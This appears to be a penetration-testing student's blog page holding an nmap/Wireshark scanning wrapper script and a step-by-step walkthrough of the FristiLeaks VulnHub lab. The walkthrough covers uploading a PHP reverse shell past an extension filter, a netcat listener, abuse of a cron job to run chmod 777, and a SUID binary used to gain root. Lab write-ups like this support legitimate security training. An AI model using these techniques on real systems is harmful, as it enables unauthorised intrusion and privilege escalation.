OSCP-bits #1: scan, a python wrapper script

Hi there,

I just started getting back into the OSCP course again. When I left off around May 2018, I had about 12 machines rooted and now I am back with a desire to get them all.

That’s why I am starting a miniseries called OSCP-bits, which include small pieces of scripts, knowledge or other things I learned during my OSCP studies.

So, it occurred to me that I start off scanning every machine with the same set of options, using onetwopunch.sh by superkojiman:

  • https://github.com/superkojiman/onetwopunch/blob/master/onetwopunch.sh
  • Also I recently started to always open Wireshark before scanning so I can follow what exactly is happening there. And so I spent about 3 minutes to set it all up before I would scan away. Time that I can use better on enumeration or other stuff, especially if you think about the OSCP exam.
    So what better than to automate that process in one short command? Say:

    scan

    And I did find a solution for it using python. But there are still a few rough edges to it that are a bit on the quick&dirty side of things. Parsing options from a python script to a command line script that in turn parses them to a command line program turns out to be somewhat of a pain in the butt.
    For you to make this script work, download the onetwopunch.sh script to ~/scripts , then make a copy of it:

    $ cp onetwopunch.sh onetwopunch_standard.sh

    Then you need to modify line 56 of it to suit your needs. The default of onetwopunch.sh is:

    -sV

    I changed it to the following, as I don’t mind to go all in on vulnerable VMs:

    -vv -Pn -sV -sC

    Of course this is not a perfect solution, but for the moment it works just fine.

    So then just add the script below to your /root/scripts directory on the Kali Machine and make a Symlink to your path /usr/bin :

    $ ln -s /scripts/scan /usr/bin/scan

    After opening a new shell you can type scan from everywhere and it will open up Wireshark with the capture filter host and sets it to the interface tap0 which is usually the one you will be connecting to the OSCP VPN with. It also has the switches -S -l and -k set to automatically update the packet display, enable automatic scrolling (does not work in the version provided on the OSCP VM, I did not update it) and -k to start capturing immediately.

    The script in action

    So here is the code of /root/scripts/scan , just make sure to make it executable before running it with:

    $ chmod +x scan

    Also I recommend using a terminal that is somewhat translucent, Terminator is my favourite, as it is so versatile. Just the opacity to about 80% and you can still see what’s happening in the background with not being to much deterred by it.

    #!/usr/bin/env python

    ##
    import sys
    import os
    import subprocess
    import time

    # Create a temporary textfile containing the target's hostname/ip

    f = open("/tmp/target.txt", "w+")

    target = sys.argv[1]
    input = target + "\n"
    f.write(input)
    f.close()

    print ""
    print ""
    print "Scanning " + sys.argv[1] + " ..."
    print ""
    print ""

    ## Open up wireshark in a window and set the filter to match the sending and the receiving host

    # Filter for subprocess
    _filter = str("host " + target + " ")
    _filter = str(_filter)
    pid = subprocess.Popen(['/usr/bin/wireshark', '-f', _filter, '-i', 'tap0', '-k', '-l', '-S' ]).pid

    ## Wrapper for onetwopunch.sh
    time.sleep(7)

    subprocess.check_call(['/root/scripts/onetwopunch_standard.sh', '-t', '/tmp/target.txt', '-p', 'all', '-i', 'tap0'])

    os.remove("/tmp/target.txt")

    I got a couple things on my mind what else to with that script or how to improve it, but for now it’s ripe for you to try it out and give some feedback or just work with it as is.

    Cheers,
    walksthewires

    Advertisements

    Fristileaks 1.3

    The machine can be downloaded here:

    https://www.vulnhub.com/entry/fristileaks-13,133/

    Thanks to the guy who built it: Ar0xA

    It’s a beginner level Vulnerable machine which was part of some dutch hacking con, and is meant to be solved under 4 hours.

    Without further due, let’s delve into it:
    Step 1: Lets’ use netdiscover with the following command to find the host

    netdiscover -i eth0 -r 192.168.178.0/24

    Unfortunately this did not work out as, can be seen here:

    Fristi_01

    Step 2: Let’s use nmap, to scan the machine

    While booting up the virtual machine, the machine’s IP Adress is visible, which is why I do not consider finding the IP part of the game:

    nmap -A -vv -T5 -oN fristileaks 192.168.178.53

    # Nmap 7.60 scan initiated Tue Jan 9 21:37:17 2018 as: nmap -A -vv -T5 -oN fristileaks 192.168.178.53

    Nmap scan report for 192.168.178.53

    Host is up, received arp-response (0.00042s latency).

    Scanned at 2018-01-09 21:37:17 GMT for 12s

    Not shown: 999 filtered ports

    Reason: 990 no-responses and 9 host-prohibited

    PORT STATE SERVICE REASON VERSION

    80/tcp open http syn-ack ttl 64 Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

    | http-methods:

    | Supported Methods: GET HEAD POST OPTIONS TRACE

    |_ Potentially risky methods: TRACE

    | http-robots.txt: 3 disallowed entries

    |_/cola /sisi /beer

    |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

    MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

    Device type: general purpose

    Running: Linux 2.6.X|3.X

    OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3

    OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13

    TCP/IP fingerprint:

    Uptime guess: 0.011 days (since Tue Jan 9 21:21:55 2018)

    So what does this tell us?

    There is only port 80 opened on the machine.

    There’s an Apache 2.2.15 running on CentOS bundled together with DAV/2 and PHP/5.3.3

    The robots.txt reads like this:

    User-agent: *

    Disallow: /cola

    Disallow: /sisi

    Disallow: /beer

    Those might be interesting links to follow. Let’s see…

    Step 3: Visit the webpage, check disallowed pages and sourcecode for hints

    Fristi_03

    Ok, so Fristi is some sort of mixed milkdrink from the netherlands. Honestly I should have looked this up first, otherwise I wouldn’t have been stuck so long on this hint. In my defense, it’s usually quite late when I get to work on my vulnerable machines and after a long day’s work and some time in the gym I might lack some basic creativity.

    So all the links (named after drinks, obviously beer and cola, sisi is some dutch speciality, too) mentioned in the robots.txt lead to a page that only contains of the following picture:

    Screenshot from 2018-01-11 22-42-31
    Yea, the source code on all three pages reveals nothing, too. I think I will just not mention the hour I spent using dirb trying to find other directories of interest.

    Also I won’t mention the time I spent using strings, exif and foremost looking to pull any more info from the pictures the webpage gave me.

    Even the /colasisibeer directory did not exist.

    So if you do not find the obvious you need to look for the obscure. At least that’s what I though at that moment.

    So of course the next step was:

    Step 4: Looking for exploits with searchsploit

    As described above I was quite desperate at that moment, so I found myself two exploits which might fit the bill:

    searchsploit Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3

    apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt

    Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | exploits/linux/webapps/42745.py

    After spending another 20 minutes trying to understand what they do, I figured this is a beginner VM after all and this is surely not the intended part to take. Also since I did not want to spent more time on this, I did not shoot the exploits without understanding what they do. Think that’s a good rule to hold on to.

    Step 5: Help me internet, dammit

    So, after all this exploring in the wrong direction I consulted the unending wisdom of the internetz for some help on my lack of creativity here.

    The answer was so simple… I swear I will do my basic research up front from now on:

    http://192.168.178.53/fristi/

    So this is where the admin portal login hid. The picture says it all:

    haha

    Step 6: Back on track, checking the page source for hints

    So after quickly checking for sql injection errors (kinda pointless), I did check the source code, which indeed does look more promising:

    1) There is this comment, which contains the username possible eezeepz:

    !-- TODO: We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz --

    2) Also the source code contains two base64 encoded parts. The second part is commented out.

    The note above refering to it as junk, so let’s decode it (with encode2 being the part :

    cat encode2 | base64 --decode > out.png

    The out.png looks like this:

    kek
    So we got a possible username and this weird string keKkeKKeKKeKkEkkEk saved in a picture. Might as well be the credentials we need. After all this needs to be done in less than four hours.

    Step 7: The login does work, we got an upload page

    upload

    So with the login successful, we are able to upload pics now, possibly also a shell in php, too. So I quickly prepared pentestmonkey’s php shell (http://pentestmonkey.net/tools/web-shells/php-reverse-shell ) and created a netcat listener on my machine:

    netcat -vvl -p 8000

    So I cannot upload php files directly, the files needs to be a .png, a .jpg or a.gif file. So I change the shell’s name to shell.php.png and here we go:

    boom

    Step 8: We got shell now! Let’s explore.

    By opening http://192.168.178.53/fristi/uploads/shell.php we will get a reverse shell on our on listener:

    Fristi_06

    By default I always try this to update the shell to a tty shell, so it’s more easy to use:

    echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

    cd /tmp

    python asdf.py

    After navigating the filesystem a bit I find a note in /var/www/cgi-bin :

    hey eezeepz your homedir is a mess, go clean it up, just dont delete

    the important stuff.

    -jerry

    Following up on this, I found another notes file in /home/eezeepz

    Yo EZ,

    I made it possible for you to do some automated checks,

    but I did only allow you access to /usr/bin/* system binaries. I did

    however copy a few extra often needed commands to my

    homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those

    from /home/admin/

    Don't forget to specify the full path for each binary!

    Just put a file called "runthis" in /tmp/, each line one command. The

    output goes to the file "cronresult" in /tmp/. It should

    run every minute with my account privileges.

    - Jerry

    Intrigued. So, chmod is available with the admin user’s privileges? Let’s make the the /home/admin folder accesible to everyone.

    cd /tmp

    echo "/home/admin/chmod -R 777 /home/admin/" > runthis

    Step 9: Let’s browse the admin directory.

    admindir
    cat whoisyourgodnow.txt

    =RFn0AKnlMHMPIzpyuTI0ITG

    Interesting… let’s see.

    cat cryptedpass.txt

    mVGZ3O3omkJLmy2pcuTq

    Ok, so what’s cryptpass.py ?

    cat cryptpass.py

    #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn

    import base64,codecs,sys

    def encodeString(str):

    base64string= base64.b64encode(str)

    return codecs.encode(base64string[::-1], 'rot13')

    cryptoResult=encodeString(sys.argv[1])

    print cryptoResult

    So, let’s built a little python script, that does the above’s script encoding in reverse. Easy, let’s build the script and decode the whoisyourgodnow.txt on my machine:

    import base64,codecs,sys

    def decodeString(str):

    reverse = (str[::-1])

    rot13string = codecs.decode(reverse, 'rot13')

    return base64.b64decode(rot13string)

    cryptoResult = decodeString(sys.argv[1])

    print cryptoResult

    Great success, the password looks to be LetThereBeFristi!

    Let’s try it!

    Step 10: Let’s login as fristigod.

    Let’s do this. Why fristigod? Because, besides the eezeepz and the admin dir, there is a fristigod dir in the /home directory.

    su - fristigod

    As soon as we are fristigod I found this:

    cd /var/fristigod/.secret_admin_stuff

    There is a SUID executable called doCom with the following permissions:

    -rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom

    I checked the file with strings:

    /lib64/ld-linux-x86-64.so.2

    __gmon_start__

    libc.so.6

    setuid

    exit

    strcat

    stderr

    system

    getuid

    fwrite

    __libc_start_main

    GLIBC_2.2.5

    fff.

    fffff.

    l$ L

    t$(L

    |$0H

    Nice try, but wrong user ;)

    Usage: ./program_name terminal_command ...

    I tried to execute this, but it did not let me:

    sudo ./doCom

    [sudo] password for fristigod: LetThereBeFristi!

    Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain.

    Step 11: Following the lead in the .bash_history file

    In the home directory of fristigod I found a bash history file:

    cat .bash_history

    This looks promising:

    sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

    Let’s just try this then:

    bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

    bash-4.1# whoami

    whoami

    root

    Boom, root! Let’s wrap this up:

    cd /root

    cat fristileaks_secrets.txt

    Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

    I wonder if you beat it in the maximum 4 hours it's supposed to take!

    Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

    Flag: Y0u_kn0w_y0u_l0ve_fr1st1

    Done!

    Despite the first lack of research into what Fristi is, I think I managed to pull this off in about 4 hours. Still, there is a feeling that I cheated on this. Hopefully the next Vulnhub VM will be all my work.

    Again, thanks to the Author of Fristileaks and also a shout out to the Vulnhub.com page, which does a great job hosting all those machines.

    Cheers.

    Rebooting the blog in preparation for the OSCP Certification

    Hello again. After a long absence from blogging, I decided to reboot the blog for the preparation phase of my OSCP course, which is scheduled to start on 21st of January 2018.

     

    I decided to go along the path abatchy suggested in his blogpost (http://www.abatchy.com/2017/02/oscp-like-vulnhub-vms), and try to solve as many of the Vulnerable machines I can get my hands on before the course itself starts.

     

    The list, I shamelessly copied from his blog, reads like this:

    Beginner friendly

    Intermediate

    Not so sure (Didn’t solve them yet)

     

    In general I try to solve those machines with my own skills and knowledge. But if I get stuck I will not hesitate to use any walkthroughs available to help me through, because this way I will learn things I did not know before.

    And this might make the difference when running the OSCP test.

    Stay tuned for more to come soon.